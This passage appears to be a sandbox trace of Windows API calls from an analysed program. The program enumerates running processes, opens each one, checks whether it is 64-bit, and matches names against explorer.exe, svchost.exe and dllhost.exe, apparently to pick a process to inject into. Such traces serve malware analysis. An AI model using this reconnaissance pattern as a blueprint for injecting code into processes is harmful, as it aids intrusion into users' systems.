hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0212.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0212.938] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0212.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0212.939] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0212.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0212.939] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0212.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0212.940] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0212.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0212.940] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0212.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0212.941] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0212.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0212.941] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0212.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0212.942] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0212.942] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0212.943] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0212.943] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0212.944] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0212.944] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0212.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0212.945] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0212.945] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0212.946] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0212.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0212.946] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0212.947] CloseHandle (hObject=0xd8) returned 1 [0212.947] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0212.947] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0212.947] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0212.947] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0212.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0212.947] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0212.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0212.948] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0212.948] CloseHandle (hObject=0xd8) returned 1 [0212.948] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0212.948] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0212.948] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0212.948] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0212.949] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0212.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0212.949] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0212.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0212.950] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0212.950] CloseHandle (hObject=0xd8) returned 1 [0212.950] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0212.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0212.950] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0212.950] CloseHandle (hObject=0xd8) returned 1 [0212.950] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0212.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0212.951] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0212.951] CloseHandle (hObject=0xd8) returned 1 [0212.951] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0212.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0212.951] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0212.951] CloseHandle (hObject=0xd8) returned 1 [0212.951] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0212.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0212.952] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0212.952] CloseHandle (hObject=0xd8) returned 1 [0212.952] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0212.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0212.953] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0212.953] CloseHandle (hObject=0xd8) returned 1 [0212.953] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0212.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0212.953] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0212.953] CloseHandle (hObject=0xd8) returned 1 [0212.953] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0212.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0212.954] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0212.954] CloseHandle (hObject=0xd8) returned 1 [0212.954] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0212.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0212.954] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0212.954] CloseHandle (hObject=0xd8) returned 1 [0212.954] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0212.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0212.955] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0212.955] CloseHandle (hObject=0xd8) returned 1 [0212.955] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0212.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0212.956] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0212.956] CloseHandle (hObject=0xd8) returned 1 [0212.956] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0212.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0212.956] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0212.956] CloseHandle (hObject=0xd8) returned 1 [0212.956] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0212.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0212.957] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0212.957] CloseHandle (hObject=0xd8) returned 1 [0212.957] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0212.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0212.957] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0212.957] CloseHandle (hObject=0xd8) returned 1 [0212.957] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0212.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0212.958] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0212.958] CloseHandle (hObject=0xd8) returned 1 [0212.958] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0212.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0212.958] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0212.958] CloseHandle (hObject=0xd8) returned 1 [0212.959] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0212.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0212.959] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0212.959] CloseHandle (hObject=0xd8) returned 1 [0212.959] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0212.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0212.960] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0212.960] CloseHandle (hObject=0xd8) returned 1 [0212.960] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0212.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0212.960] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0212.960] CloseHandle (hObject=0xd8) returned 1 [0212.960] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0212.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0212.961] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0212.961] CloseHandle (hObject=0xd8) returned 1 [0212.961] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0212.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0212.961] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0212.962] CloseHandle (hObject=0xd8) returned 1 [0212.962] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0212.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0212.962] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0212.963] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0212.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0212.963] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0212.964] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0212.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0212.964] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0212.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0212.965] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0212.965] CloseHandle (hObject=0xd8) returned 1 [0212.965] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0212.965] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0213.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0213.011] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0213.011] CloseHandle (hObject=0xd8) returned 1 [0213.011] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0213.011] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0213.011] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0213.011] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0213.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0213.012] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0213.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0213.012] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0213.012] CloseHandle (hObject=0xd8) returned 1 [0213.012] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0213.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0213.013] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0213.013] 